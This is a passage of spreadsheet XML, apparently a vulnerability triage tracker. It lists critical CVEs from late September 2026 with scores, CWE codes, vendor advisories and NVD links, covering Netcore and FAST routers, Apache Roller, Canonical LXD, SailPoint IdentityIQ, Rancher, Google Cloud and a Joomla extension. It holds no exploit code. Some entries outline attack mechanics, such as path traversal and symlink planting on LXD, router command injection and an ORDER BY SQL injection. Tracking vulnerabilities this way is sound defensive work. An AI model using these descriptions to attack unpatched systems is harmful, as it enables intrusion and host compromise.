      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Netcore NR289-GE 1.4.5102. This impacts the function process_request of the component boa_temp Handler. This manipulation causes missing authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101077</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102240</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Netcore NAP930 0.1.241010.141410. This affects the function eval of the file /www/cgi-bin/network_tools of the component Network Tools CGI. The manipulation of the argument sid results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102240</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101037</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FAST FAC1200R 5.0_20201119_1.0.2. Affected is the function parse_advertisement_frame of the component devdiscover Service. The manipulation results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101037</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101038</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in FAST FAC1200R 5.0_20201119_1.0.2. Affected by this vulnerability is the function MmtAtePrase of the component MmtAtePrase Parser. This manipulation causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101038</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82377</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in Apache Roller 6.1.5 allows an authenticated user to read, modify, or delete weblog content belonging to other weblogs through the legacy XML-RPC Blogger and MetaWeblog APIs, because the handlers authenticate the caller but do not verify the caller's permission on the weblog or entry actually affected. Only installations that enable the non-default global XML-RPC setting are affected; the per-weblog API flag defaults to enabled for UI-created weblogs. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which applies an explicit per-method permission check, or to keep the XML-RPC feature disabled.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82377</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85526</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the Btrfs storage driver (unpackVolume) in Canonical LXD on Linux allows an authenticated user with instance creation privileges to delete or replace arbitrary files and directories on the host filesystem as root via a crafted subvolumes[].path entry in backup/optimized_header.yaml during a btrfs optimized backup import.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85526</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87799</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution in the migration receive path in Canonical LXD versions 4.0 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client that can create instances or custom storage volumes in a project, or a malicious migration source server, to write attacker-controlled files to arbitrary paths on the target host as root, leading to full host compromise. The attacker does this with a crafted rsync or btrfs send stream that plants a symlink in the transferred volume, such as rootfs or root.img, and then writes through it.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87799</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82384</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Deserialization of Untrusted Data in Apache Roller 6.1.5 allows an unauthenticated remote attacker to cause deserialization of attacker-controlled bytes, because the XML-RPC endpoint accepts vendor extension types that are deserialized during request parsing, before authentication. The servlet is mapped unconditionally, so parsing occurs even when the global XML-RPC feature is set to disabled; no non-default configuration is required for this path. This can lead to remote code execution. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which disables the extension types and rejects requests when the XML-RPC feature is disabled.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82384</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90924</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Use of default credentials vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Try Common or Default Usernames and Passwords.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90924</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101354</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in FAST FAC1203R 20200116_2.0.4. The affected element is the function _tWlanTask of the component MmtAtePrase Parser. Performing a manipulation results in stack-based buffer overflow. The attacker must have access to the local network to execute the attack. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101354</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12342</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@sailpoint.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>This vulnerability
impacts all versions of IdentityIQ and allows an unauthenticated user remote
code execution on the IdentityIQ server due to improper input validation of
submitted web service API content.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12342</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85185</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Path traversal in the btrfs storage driver in Canonical LXD versions 4.0.2 and later (fixed in 4.0.14, 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create instances in a project to delete arbitrary files on the host as root. On hosts whose root filesystem is btrfs, the client can also place attacker-controlled content at arbitrary host paths, leading to full host compromise. The client does this with a crafted subvolume path containing ../ sequences, sent in either of two ways: in the optimized_header.yaml of an optimized btrfs backup, or in the btrfs migration header sent by a malicious migration source.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85185</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88804</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated update of public UI settings could be used by remote attackers to execute a stored cross-site scripting attack in the Rancher UI, in SUSE Rancher 2.15 before 2.15.2, 2.14 before 2.14.6, 2.13 before 2.13.10, 2.12 before 2.12.14 and 2.11 before 2.11.18.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88804</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19759</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>An Incorrect Authorization vulnerability in the task configuration in Google Cloud Application Integration versions prior to 2026-06-17 on Google Cloud Platform allows an authenticated Google Cloud user to execute arbitrary internal RPCs from inside Google's production network under a privileged identity using an internal-only task type.
This vulnerability was patched on 17 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19759</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81867</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in the JavaScript Task in Google Cloud Application Integration versions prior to 2026-06-28 on Google Cloud Platform allows an authenticated user with standard permissions to run arbitrary code on the shared production servers using a specially crafted script bypassing param guards.
This vulnerability was patched on 28 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81867</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100752</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Real Estate Manager (Free) &lt; 6.7.9 - site/realestatemanager.php builds the ORDER BY clause of three separate frontend property-listing queries (category browsing, search results, and the full property listing) from a request-controlled order_field parameter, concatenated directly into an unquoted SQL clause with no allow-list of real column names and no cast.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100752</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101039</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
